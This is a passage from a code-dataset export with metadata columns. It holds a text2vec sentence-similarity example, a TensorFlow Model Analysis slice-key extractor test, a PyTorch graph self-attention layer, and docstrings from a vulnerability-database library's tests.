assert cves[0].cve_id == 'CVE-2016-10516'
|
en
| 0.413626
|
Tests for `victimsdb_lib.database` module. Test VictimsDB.from_dir(). Test VictimsDB.cves_for() for known package. Test VictimsDB.cves_for() for unknown package. Test VictimsDB.cves_for() YAMLs with improper/not parseable files. Test VictimsDB.java_vulnerabilities(). Test VictimsDB.javascript_vulnerabilities(). Test VictimsDB.python_vulnerabilities(). Test len() on VictimsDB(). Test [] on VictimsDB(). Test iter() with VictimsDB(). Test `in` with VictimsDB(). Test VictimsDB().merge(). Test VictimsDB().merge(), but override our records. Test VictimsDB().from_git_url().
| 2.65703
| 3
|
examples/word2vec_similarity.py
|
shibing624/text2vec
| 380
|
6628476
|
<filename>examples/word2vec_similarity.py
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import sys
sys.path.append('..')
from text2vec import Similarity, cos_sim
sim = Similarity()
# Two lists of sentences
sentences1 = ['如何更换花呗绑定银行卡',
'The cat sits outside',
'A man is playing guitar',
'The new movie is awesome']
sentences2 = ['花呗更改绑定银行卡',
'The dog plays in the garden',
'A woman watches TV',
'The new movie is so great']
# Output the pairs with their score
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim2 = Similarity(similarity_type='wmd', embedding_type='w2v')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim2.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim3 = Similarity(similarity_type='cosine', embedding_type='sbert')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim3.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
|
<filename>examples/word2vec_similarity.py
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import sys
sys.path.append('..')
from text2vec import Similarity, cos_sim
sim = Similarity()
# Two lists of sentences
sentences1 = ['如何更换花呗绑定银行卡',
'The cat sits outside',
'A man is playing guitar',
'The new movie is awesome']
sentences2 = ['花呗更改绑定银行卡',
'The dog plays in the garden',
'A woman watches TV',
'The new movie is so great']
# Output the pairs with their score
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim2 = Similarity(similarity_type='wmd', embedding_type='w2v')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim2.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
sim3 = Similarity(similarity_type='cosine', embedding_type='sbert')
for i in range(len(sentences1)):
for j in range(len(sentences2)):
score = sim3.get_score(sentences1[i], sentences2[j])
print("{} \t\t {} \t\t Score: {:.4f}".format(sentences1[i], sentences2[j], score))
print()
|
en
| 0.802135
|
# -*- coding: utf-8 -*- @author:XuMing(<EMAIL>) @description: # Two lists of sentences # Output the pairs with their score
| 3.239204
| 3
|
tensorflow_model_analysis/extractors/slice_key_extractor_test.py
|
hephaex/model-analysis
| 2
|
6628477
|
<reponame>hephaex/model-analysis<filename>tensorflow_model_analysis/extractors/slice_key_extractor_test.py
# Lint as: python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for slice_key_extractor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import apache_beam as beam
from apache_beam.testing import util
import numpy as np
import tensorflow as tf
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import types
from tensorflow_model_analysis.eval_saved_model import testutil
from tensorflow_model_analysis.extractors import slice_key_extractor
from tensorflow_model_analysis.slicer import slicer_lib as slicer
def make_features_dict(features_dict):
result = {}
for key, value in features_dict.items():
result[key] = {'node': np.array(value)}
return result
def create_fpls():
fpl1 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['f'],
'age': [13],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
fpl2 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
return [fpl1, fpl2]
def wrap_fpl(fpl):
return {
constants.INPUT_KEY: fpl,
constants.FEATURES_PREDICTIONS_LABELS_KEY: fpl
}
class SliceTest(testutil.TensorflowModelAnalysisTest, parameterized.TestCase):
@parameterized.named_parameters(
('features_only', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [slicer.SingleSliceSpec(columns=['gender'])], [[(('gender', 'm'),)],
[(('gender', 'f'),)]]),
('duplicate_feature_keys', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [
slicer.SingleSliceSpec(columns=['gender']),
slicer.SingleSliceSpec(columns=['gender'])
], [[(('gender', 'm'),)], [(('gender', 'f'),)]]),
('transformed_features', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['boats']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['planes']
})
}], [slicer.SingleSliceSpec(columns=['interest'])
], [[(('interest', 'boats'),)], [(('interest', 'planes'),)]]),
('transformed_features_with_multiple_models', ['model1', 'model2'], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['boats']}),
'model2': make_features_dict({'interest': ['planes']})
}
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['planes']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['trains']}),
'model2': make_features_dict({'interest': ['planes']})
}
}], [slicer.SingleSliceSpec(columns=['interest'])], [[
(('interest', 'boats'),), (('interest', 'planes'),)
], [(('interest', 'planes'),), (('interest', 'trains'),)]]),
)
def testSliceKeys(self, model_names, extracts, slice_specs, expected_slices):
eval_config = config.EvalConfig(
model_specs=[config.ModelSpec(name=name) for name in model_names])
with beam.Pipeline() as pipeline:
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(extracts)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
slice_spec=slice_specs, eval_config=eval_config))
def check_result(got):
try:
self.assertLen(got, 2)
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_slices)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys([
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
]))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = sorted([[(), (('gender', 'f'),)],
[(), (('gender', 'm'),)]])
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testMaterializedLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
[
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
],
materialize=True))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = [
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:f']),
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:m'])
]
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEYS_KEY, item)
got_result = item[constants.SLICE_KEYS_KEY]
got_results.append(
got_result._replace(value=sorted(got_result.value)))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
if __name__ == '__main__':
tf.test.main()
|
# Lint as: python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for slice_key_extractor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import apache_beam as beam
from apache_beam.testing import util
import numpy as np
import tensorflow as tf
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import types
from tensorflow_model_analysis.eval_saved_model import testutil
from tensorflow_model_analysis.extractors import slice_key_extractor
from tensorflow_model_analysis.slicer import slicer_lib as slicer
def make_features_dict(features_dict):
result = {}
for key, value in features_dict.items():
result[key] = {'node': np.array(value)}
return result
def create_fpls():
fpl1 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['f'],
'age': [13],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
fpl2 = types.FeaturesPredictionsLabels(
input_ref=0,
features=make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
predictions=make_features_dict({
'kb': [1],
}),
labels=make_features_dict({'ad_risk_score': [0]}))
return [fpl1, fpl2]
def wrap_fpl(fpl):
return {
constants.INPUT_KEY: fpl,
constants.FEATURES_PREDICTIONS_LABELS_KEY: fpl
}
class SliceTest(testutil.TensorflowModelAnalysisTest, parameterized.TestCase):
@parameterized.named_parameters(
('features_only', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [slicer.SingleSliceSpec(columns=['gender'])], [[(('gender', 'm'),)],
[(('gender', 'f'),)]]),
('duplicate_feature_keys', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
})
}], [
slicer.SingleSliceSpec(columns=['gender']),
slicer.SingleSliceSpec(columns=['gender'])
], [[(('gender', 'm'),)], [(('gender', 'f'),)]]),
('transformed_features', [''], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['boats']
})
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['planes']
})
}], [slicer.SingleSliceSpec(columns=['interest'])
], [[(('interest', 'boats'),)], [(('interest', 'planes'),)]]),
('transformed_features_with_multiple_models', ['model1', 'model2'], [{
constants.FEATURES_KEY:
make_features_dict({
'gender': ['m'],
'age': [10],
'interest': ['cars']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['boats']}),
'model2': make_features_dict({'interest': ['planes']})
}
}, {
constants.FEATURES_KEY:
make_features_dict({
'gender': ['f'],
'age': [12],
'interest': ['planes']
}),
constants.TRANSFORMED_FEATURES_KEY: {
'model1': make_features_dict({'interest': ['trains']}),
'model2': make_features_dict({'interest': ['planes']})
}
}], [slicer.SingleSliceSpec(columns=['interest'])], [[
(('interest', 'boats'),), (('interest', 'planes'),)
], [(('interest', 'planes'),), (('interest', 'trains'),)]]),
)
def testSliceKeys(self, model_names, extracts, slice_specs, expected_slices):
eval_config = config.EvalConfig(
model_specs=[config.ModelSpec(name=name) for name in model_names])
with beam.Pipeline() as pipeline:
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(extracts)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
slice_spec=slice_specs, eval_config=eval_config))
def check_result(got):
try:
self.assertLen(got, 2)
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_slices)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys([
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
]))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = sorted([[(), (('gender', 'f'),)],
[(), (('gender', 'm'),)]])
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEY_TYPES_KEY, item)
got_results.append(sorted(item[constants.SLICE_KEY_TYPES_KEY]))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
def testMaterializedLegacySliceKeys(self):
with beam.Pipeline() as pipeline:
fpls = create_fpls()
slice_keys_extracts = (
pipeline
| 'CreateTestInput' >> beam.Create(fpls)
| 'WrapFpls' >> beam.Map(wrap_fpl)
| 'ExtractSlices' >> slice_key_extractor.ExtractSliceKeys(
[
slicer.SingleSliceSpec(),
slicer.SingleSliceSpec(columns=['gender'])
],
materialize=True))
def check_result(got):
try:
self.assertLen(got, 2)
expected_results = [
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:f']),
types.MaterializedColumn(
name=constants.SLICE_KEYS_KEY,
value=[b'Overall', b'gender:m'])
]
got_results = []
for item in got:
self.assertIn(constants.SLICE_KEYS_KEY, item)
got_result = item[constants.SLICE_KEYS_KEY]
got_results.append(
got_result._replace(value=sorted(got_result.value)))
self.assertCountEqual(got_results, expected_results)
except AssertionError as err:
raise util.BeamAssertException(err)
util.assert_that(slice_keys_extracts, check_result)
if __name__ == '__main__':
tf.test.main()
|
en
| 0.833855
|
# Lint as: python3 # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Test for slice_key_extractor.
| 2.070065
| 2
|
model/graph_att_layer.py
|
Originofamonia/VQA_ReGAT
| 0
|
6628478
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Relation-aware Graph Attention Network for Visual Question Answering
<NAME>, <NAME>, <NAME>, <NAME>
https://arxiv.org/abs/1903.12314
This code is written by <NAME>.
"""
import torch
import torch.nn as nn
from model.fc import FCNet
import math
from torch.nn.utils.weight_norm import weight_norm
class GraphSelfAttentionLayer(nn.Module):
def __init__(self, feat_dim, nongt_dim=20, pos_emb_dim=-1,
num_heads=16, dropout=[0.2, 0.5]):
""" Attention module with vectorized version
Args:
# position_embedding: [num_rois, nongt_dim, pos_emb_dim]
# used in implicit relation
pos_emb_dim: set as -1 if explicit relation
nongt_dim: number of objects consider relations per image
# fc_dim: should be same as num_heads
feat_dim: dimension of roi_feat
num_heads: number of attention heads
Returns:
output: [num_rois, ovr_feat_dim, output_dim]
"""
super(GraphSelfAttentionLayer, self).__init__()
# multi head
self.fc_dim = num_heads
self.feat_dim = feat_dim
self.dim = (feat_dim, feat_dim, feat_dim)
self.dim_group = (int(self.dim[0] / num_heads),
int(self.dim[1] / num_heads),
int(self.dim[2] / num_heads))
self.num_heads = num_heads
self.pos_emb_dim = pos_emb_dim
if self.pos_emb_dim > 0:
self.pair_pos_fc1 = FCNet([pos_emb_dim, self.fc_dim], None, dropout[0])
self.query = FCNet([feat_dim, self.dim[0]], None, dropout[0])
self.nongt_dim = nongt_dim
self.key = FCNet([feat_dim, self.dim[1]], None, dropout[0])
self.linear_out_ = weight_norm(
nn.Conv2d(in_channels=self.fc_dim * feat_dim,
out_channels=self.dim[2],
kernel_size=(1, 1),
groups=self.fc_dim), dim=None)
def forward(self, roi_feat, adj_matrix,
position_embedding, label_biases_att):
"""
Args:
roi_feat: [batch_size, N, feat_dim]
adj_matrix: [batch_size, N, nongt_dim]
position_embedding: [num_rois, nongt_dim, pos_emb_dim]
Returns:
output: [batch_size, num_rois, ovr_feat_dim, output_dim]
"""
batch_size = roi_feat.size(0)
num_rois = roi_feat.size(1)
nongt_dim = self.nongt_dim if self.nongt_dim < num_rois else num_rois
# [batch_size, nongt_dim, feat_dim]
nongt_roi_feat = roi_feat[:, :nongt_dim, :]
# [batch_size, num_rois, self.dim[0] = feat_dim]
q_data = self.query(roi_feat)
# [batch_size, num_rois, num_heads, feat_dim /num_heads]
q_data_batch = q_data.view(batch_size, num_rois, self.num_heads,
self.dim_group[0])
# [batch_size, num_heads, num_rois, feat_dim /num_heads]
q_data_batch = torch.transpose(q_data_batch, 1, 2)
# [batch_size, nongt_dim, self.dim[1] = feat_dim]
k_data = self.key(nongt_roi_feat)
# [batch_size, nongt_dim, num_heads, feat_dim /num_heads]
k_data_batch = k_data.view(batch_size, nongt_dim, self.num_heads,
self.dim_group[1])
# [batch_size, num_heads, nongt_dim, feat_dim /num_heads]
k_data_batch = torch.transpose(k_data_batch, 1, 2)
# [batch_size, nongt_dim, feat_dim]
v_data = nongt_roi_feat
# [batch_size, num_heads, num_rois, nongt_dim]
aff = torch.matmul(q_data_batch, torch.transpose(k_data_batch, 2, 3))
# aff_scale, [batch_size, num_heads, num_rois, nongt_dim]
aff_scale = (1.0 / math.sqrt(float(self.dim_group[1]))) * aff
# aff_scale, [batch_size, num_rois, num_heads, nongt_dim]
aff_scale = torch.transpose(aff_scale, 1, 2)
weighted_aff = aff_scale
if position_embedding is not None and self.pos_emb_dim > 0:
# Adding geometric features
position_embedding = position_embedding.float()
# [batch_size, num_rois * nongt_dim, emb_dim]
position_embedding_reshape = position_embedding.view(
(batch_size, -1, self.pos_emb_dim))
# position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim]
position_feat_1 = self.pair_pos_fc1(position_embedding_reshape)
position_feat_1_relu = nn.functional.relu(position_feat_1)
# aff_weight, [batch_size, num_rois, nongt_dim, fc_dim]
aff_weight = position_feat_1_relu.view(
(batch_size, -1, nongt_dim, self.fc_dim))
# aff_weight, [batch_size, num_rois, fc_dim, nongt_dim]
aff_weight = torch.transpose(aff_weight, 2, 3)
thresh = torch.FloatTensor([1e-6]).cuda()
# weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim]
threshold_aff = torch.max(aff_weight, thresh)
weighted_aff += torch.log(threshold_aff)
if adj_matrix is not None:
# weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads]
weighted_aff_transposed = torch.transpose(weighted_aff, 2, 3)
zero_vec = -9e15 * torch.ones_like(weighted_aff_transposed)
adj_matrix = adj_matrix.view(
adj_matrix.shape[0], adj_matrix.shape[1],
adj_matrix.shape[2], 1)
adj_matrix_expand = adj_matrix.expand(
(-1, -1, -1,
weighted_aff_transposed.shape[-1]))
weighted_aff_masked = torch.where(adj_matrix_expand > 0,
weighted_aff_transposed,
zero_vec)
weighted_aff_masked = weighted_aff_masked + \
label_biases_att.unsqueeze(3)
weighted_aff = torch.transpose(weighted_aff_masked, 2, 3)
# aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim]
aff_softmax = nn.functional.softmax(weighted_aff, 3)
# aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim]
aff_softmax_reshape = aff_softmax.view((batch_size, -1, nongt_dim))
# output_t, [batch_size, num_rois * fc_dim, feat_dim]
output_t = torch.matmul(aff_softmax_reshape, v_data)
# output_t, [batch_size * num_rois, fc_dim * feat_dim, 1, 1]
output_t = output_t.view((-1, self.fc_dim * self.feat_dim, 1, 1))
# linear_out, [batch_size * num_rois, dim[2], 1, 1]
linear_out = self.linear_out_(output_t)
output = linear_out.view((batch_size, num_rois, self.dim[2]))
return output
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Relation-aware Graph Attention Network for Visual Question Answering
<NAME>, <NAME>, <NAME>, <NAME>
https://arxiv.org/abs/1903.12314
This code is written by <NAME>.
"""
import torch
import torch.nn as nn
from model.fc import FCNet
import math
from torch.nn.utils.weight_norm import weight_norm
class GraphSelfAttentionLayer(nn.Module):
def __init__(self, feat_dim, nongt_dim=20, pos_emb_dim=-1,
num_heads=16, dropout=[0.2, 0.5]):
""" Attention module with vectorized version
Args:
# position_embedding: [num_rois, nongt_dim, pos_emb_dim]
# used in implicit relation
pos_emb_dim: set as -1 if explicit relation
nongt_dim: number of objects consider relations per image
# fc_dim: should be same as num_heads
feat_dim: dimension of roi_feat
num_heads: number of attention heads
Returns:
output: [num_rois, ovr_feat_dim, output_dim]
"""
super(GraphSelfAttentionLayer, self).__init__()
# multi head
self.fc_dim = num_heads
self.feat_dim = feat_dim
self.dim = (feat_dim, feat_dim, feat_dim)
self.dim_group = (int(self.dim[0] / num_heads),
int(self.dim[1] / num_heads),
int(self.dim[2] / num_heads))
self.num_heads = num_heads
self.pos_emb_dim = pos_emb_dim
if self.pos_emb_dim > 0:
self.pair_pos_fc1 = FCNet([pos_emb_dim, self.fc_dim], None, dropout[0])
self.query = FCNet([feat_dim, self.dim[0]], None, dropout[0])
self.nongt_dim = nongt_dim
self.key = FCNet([feat_dim, self.dim[1]], None, dropout[0])
self.linear_out_ = weight_norm(
nn.Conv2d(in_channels=self.fc_dim * feat_dim,
out_channels=self.dim[2],
kernel_size=(1, 1),
groups=self.fc_dim), dim=None)
def forward(self, roi_feat, adj_matrix,
position_embedding, label_biases_att):
"""
Args:
roi_feat: [batch_size, N, feat_dim]
adj_matrix: [batch_size, N, nongt_dim]
position_embedding: [num_rois, nongt_dim, pos_emb_dim]
Returns:
output: [batch_size, num_rois, ovr_feat_dim, output_dim]
"""
batch_size = roi_feat.size(0)
num_rois = roi_feat.size(1)
nongt_dim = self.nongt_dim if self.nongt_dim < num_rois else num_rois
# [batch_size, nongt_dim, feat_dim]
nongt_roi_feat = roi_feat[:, :nongt_dim, :]
# [batch_size, num_rois, self.dim[0] = feat_dim]
q_data = self.query(roi_feat)
# [batch_size, num_rois, num_heads, feat_dim /num_heads]
q_data_batch = q_data.view(batch_size, num_rois, self.num_heads,
self.dim_group[0])
# [batch_size, num_heads, num_rois, feat_dim /num_heads]
q_data_batch = torch.transpose(q_data_batch, 1, 2)
# [batch_size, nongt_dim, self.dim[1] = feat_dim]
k_data = self.key(nongt_roi_feat)
# [batch_size, nongt_dim, num_heads, feat_dim /num_heads]
k_data_batch = k_data.view(batch_size, nongt_dim, self.num_heads,
self.dim_group[1])
# [batch_size, num_heads, nongt_dim, feat_dim /num_heads]
k_data_batch = torch.transpose(k_data_batch, 1, 2)
# [batch_size, nongt_dim, feat_dim]
v_data = nongt_roi_feat
# [batch_size, num_heads, num_rois, nongt_dim]
aff = torch.matmul(q_data_batch, torch.transpose(k_data_batch, 2, 3))
# aff_scale, [batch_size, num_heads, num_rois, nongt_dim]
aff_scale = (1.0 / math.sqrt(float(self.dim_group[1]))) * aff
# aff_scale, [batch_size, num_rois, num_heads, nongt_dim]
aff_scale = torch.transpose(aff_scale, 1, 2)
weighted_aff = aff_scale
if position_embedding is not None and self.pos_emb_dim > 0:
# Adding geometric features
position_embedding = position_embedding.float()
# [batch_size, num_rois * nongt_dim, emb_dim]
position_embedding_reshape = position_embedding.view(
(batch_size, -1, self.pos_emb_dim))
# position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim]
position_feat_1 = self.pair_pos_fc1(position_embedding_reshape)
position_feat_1_relu = nn.functional.relu(position_feat_1)
# aff_weight, [batch_size, num_rois, nongt_dim, fc_dim]
aff_weight = position_feat_1_relu.view(
(batch_size, -1, nongt_dim, self.fc_dim))
# aff_weight, [batch_size, num_rois, fc_dim, nongt_dim]
aff_weight = torch.transpose(aff_weight, 2, 3)
thresh = torch.FloatTensor([1e-6]).cuda()
# weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim]
threshold_aff = torch.max(aff_weight, thresh)
weighted_aff += torch.log(threshold_aff)
if adj_matrix is not None:
# weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads]
weighted_aff_transposed = torch.transpose(weighted_aff, 2, 3)
zero_vec = -9e15 * torch.ones_like(weighted_aff_transposed)
adj_matrix = adj_matrix.view(
adj_matrix.shape[0], adj_matrix.shape[1],
adj_matrix.shape[2], 1)
adj_matrix_expand = adj_matrix.expand(
(-1, -1, -1,
weighted_aff_transposed.shape[-1]))
weighted_aff_masked = torch.where(adj_matrix_expand > 0,
weighted_aff_transposed,
zero_vec)
weighted_aff_masked = weighted_aff_masked + \
label_biases_att.unsqueeze(3)
weighted_aff = torch.transpose(weighted_aff_masked, 2, 3)
# aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim]
aff_softmax = nn.functional.softmax(weighted_aff, 3)
# aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim]
aff_softmax_reshape = aff_softmax.view((batch_size, -1, nongt_dim))
# output_t, [batch_size, num_rois * fc_dim, feat_dim]
output_t = torch.matmul(aff_softmax_reshape, v_data)
# output_t, [batch_size * num_rois, fc_dim * feat_dim, 1, 1]
output_t = output_t.view((-1, self.fc_dim * self.feat_dim, 1, 1))
# linear_out, [batch_size * num_rois, dim[2], 1, 1]
linear_out = self.linear_out_(output_t)
output = linear_out.view((batch_size, num_rois, self.dim[2]))
return output
|
en
| 0.497053
|
Copyright (c) Microsoft Corporation. Licensed under the MIT license. Relation-aware Graph Attention Network for Visual Question Answering <NAME>, <NAME>, <NAME>, <NAME> https://arxiv.org/abs/1903.12314 This code is written by <NAME>. Attention module with vectorized version Args: # position_embedding: [num_rois, nongt_dim, pos_emb_dim] # used in implicit relation pos_emb_dim: set as -1 if explicit relation nongt_dim: number of objects consider relations per image # fc_dim: should be same as num_heads feat_dim: dimension of roi_feat num_heads: number of attention heads Returns: output: [num_rois, ovr_feat_dim, output_dim] # multi head Args: roi_feat: [batch_size, N, feat_dim] adj_matrix: [batch_size, N, nongt_dim] position_embedding: [num_rois, nongt_dim, pos_emb_dim] Returns: output: [batch_size, num_rois, ovr_feat_dim, output_dim] # [batch_size, nongt_dim, feat_dim] # [batch_size, num_rois, self.dim[0] = feat_dim] # [batch_size, num_rois, num_heads, feat_dim /num_heads] # [batch_size, num_heads, num_rois, feat_dim /num_heads] # [batch_size, nongt_dim, self.dim[1] = feat_dim] # [batch_size, nongt_dim, num_heads, feat_dim /num_heads] # [batch_size, num_heads, nongt_dim, feat_dim /num_heads] # [batch_size, nongt_dim, feat_dim] # [batch_size, num_heads, num_rois, nongt_dim] # aff_scale, [batch_size, num_heads, num_rois, nongt_dim] # aff_scale, [batch_size, num_rois, num_heads, nongt_dim] # Adding geometric features # [batch_size, num_rois * nongt_dim, emb_dim] # position_feat_1, [batch_size, num_rois * nongt_dim, fc_dim] # aff_weight, [batch_size, num_rois, nongt_dim, fc_dim] # aff_weight, [batch_size, num_rois, fc_dim, nongt_dim] # weighted_aff, [batch_size, num_rois, fc_dim, nongt_dim] # weighted_aff_transposed, [batch_size, num_rois, nongt_dim, num_heads] # aff_softmax, [batch_size, num_rois, fc_dim, nongt_dim] # aff_softmax_reshape, [batch_size, num_rois * fc_dim, nongt_dim] # output_t, [batch_size, num_rois * fc_dim, feat_dim] # output_t, [batch_size * num_rois, fc_dim * feat_dim, 1, 1] # linear_out, [batch_size * num_rois, dim[2], 1, 1]
| 2.486784
| 2
|
Memory/Main.py
|
